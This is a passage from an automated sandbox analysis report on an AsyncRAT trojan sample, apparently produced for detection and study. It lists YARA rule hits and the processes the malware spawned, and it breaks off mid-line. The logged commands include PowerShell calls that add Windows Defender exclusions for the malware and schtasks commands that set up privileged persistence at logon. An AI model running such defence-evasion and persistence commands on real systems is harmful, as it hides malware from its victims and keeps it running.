Source: 21.2.Taskshell.exe.2b28e9c.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 21.2.Taskshell.exe.2b28e9c.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 21.2.Taskshell.exe.2b28e9c.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 37.2.Taskshell.exe.304befc.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 37.2.Taskshell.exe.304befc.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 37.2.Taskshell.exe.304befc.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 33.2.Taskshell.exe.319ecd8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 33.2.Taskshell.exe.319ecd8.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 33.2.Taskshell.exe.319ecd8.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000009.00000002.1793564770.0000000003021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000021.00000002.2026862188.000000000319D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000021.00000002.2026862188.000000000319D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000000.00000002.1760909850.0000000003507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000000.00000002.1760909850.0000000003507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000009.00000002.1790797223.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000A.00000002.1858382198.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0000000A.00000002.1858382198.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000025.00000002.2090225147.000000000304A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000025.00000002.2090225147.000000000304A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000014.00000002.2954261509.0000000003491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000015.00000002.1918167976.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000015.00000002.1918167976.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: PXUVmodpCYqRIPQ.exe PID: 6792, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: PXUVmodpCYqRIPQ.exe PID: 7204, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: xcsUjVN.exe PID: 7268, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: xcsUjVN.exe PID: 7728, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: Taskshell.exe PID: 7756, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: Taskshell.exe PID: 3852, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: Taskshell.exe PID: 7576, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: PXUVmodpCYqRIPQ.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: xcsUjVN.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Taskshell.exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, fdAXeKEwYgt.cs Base64 encoded string: 'VX85ofDFWkCoyWEKRJFZp3r07oW8cd9Cgfy1ycj7xkMMRFRaA1UQQRbwjVOZWNgjHhILZQD5cEtpXvrkLJUB4Q=='
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, fdAXeKEwYgt.cs Base64 encoded string: 'VX85ofDFWkCoyWEKRJFZp3r07oW8cd9Cgfy1ycj7xkMMRFRaA1UQQRbwjVOZWNgjHhILZQD5cEtpXvrkLJUB4Q=='
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, fdAXeKEwYgt.cs Base64 encoded string: 'VX85ofDFWkCoyWEKRJFZp3r07oW8cd9Cgfy1ycj7xkMMRFRaA1UQQRbwjVOZWNgjHhILZQD5cEtpXvrkLJUB4Q=='
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, kZZryoOdRCGo.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, kZZryoOdRCGo.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.4dc1ee8.3.raw.unpack, bOIpaUIYCKOAQAMIyB.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PXUVmodpCYqRIPQ.exe.4dc1ee8.3.raw.unpack, bOIpaUIYCKOAQAMIyB.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, kZZryoOdRCGo.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, kZZryoOdRCGo.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, kZZryoOdRCGo.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, kZZryoOdRCGo.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.3100000.0.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.PXUVmodpCYqRIPQ.exe.3100000.0.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.3100000.0.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.PXUVmodpCYqRIPQ.exe.3100000.0.raw.unpack, bOIpaUIYCKOAQAMIyB.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PXUVmodpCYqRIPQ.exe.3100000.0.raw.unpack, bOIpaUIYCKOAQAMIyB.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.4d716c8.5.raw.unpack, bOIpaUIYCKOAQAMIyB.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PXUVmodpCYqRIPQ.exe.4d716c8.5.raw.unpack, bOIpaUIYCKOAQAMIyB.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.4d716c8.5.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.PXUVmodpCYqRIPQ.exe.4d716c8.5.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.4d716c8.5.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.PXUVmodpCYqRIPQ.exe.4dc1ee8.3.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.PXUVmodpCYqRIPQ.exe.4dc1ee8.3.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.4dc1ee8.3.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine Classification label: mal100.troj.evad.winEXE@57/30@0/1
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe File created: C:\Users\user\AppData\Roaming\xcsUjVN.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2516:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Mutant created: \Sessions\1\BaseNamedObjects\k5CBmR5JDsDg
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Mutant created: \Sessions\1\BaseNamedObjects\HSXNklsDUBYtQeP
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1104:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe File created: C:\Users\user\AppData\Local\Temp\tmp6ABF.tmp
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4AB4.tmp.bat""
Source: PXUVmodpCYqRIPQ.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PXUVmodpCYqRIPQ.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PXUVmodpCYqRIPQ.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe File read: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe
Source: unknown Process created: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe "C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe"
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xcsUjVN.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xcsUjVN" /XML "C:\Users\user\AppData\Local\Temp\tmp6ABF.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Process created: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe "C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe"
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Process created: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe "C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\xcsUjVN.exe C:\Users\user\AppData\Roaming\xcsUjVN.exe
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Taskshell" /tr '"C:\Users\user\AppData\Roaming\Taskshell.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4AB4.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Taskshell" /tr '"C:\Users\user\AppData\Roaming\Taskshell.exe"'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xcsUjVN" /XML "C:\Users\user\AppData\Local\Temp\tmp880B.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Process created: C:\Users\user\AppData\Roaming\xcsUjVN.exe "C:\Users\user\AppData\Roaming\xcsUjVN.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Taskshell.exe C:\Users\user\AppData\Roaming\Taskshell.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\Taskshell.exe "C:\Users\user\AppData\Roaming\Taskshell.exe"
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Taskshell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xcsUjVN.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xcsUjVN" /XML "C:\Users\user\AppData\Local\Temp\tmp948E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Process created: C:\Users\user\AppData\Roaming\Taskshell.exe "C:\Users\user\AppData\Roaming\Taskshell.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Taskshell.exe "C:\Users\user\AppData\Roaming\Taskshell.exe"
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xcsUjVN" /XML "C:\Users\user\AppData\Local\Temp\tmpCF93.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Process created: C:\Users\user\AppData\Roaming\Taskshell.exe "C:\Users\user\AppData\Roaming\Taskshell.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Taskshell.exe "C:\Users\user\AppData\Roaming\Taskshell.exe"
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xcsUjVN" /XML "C:\Users\user\AppData\Local\Temp\tmpEF41.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Wi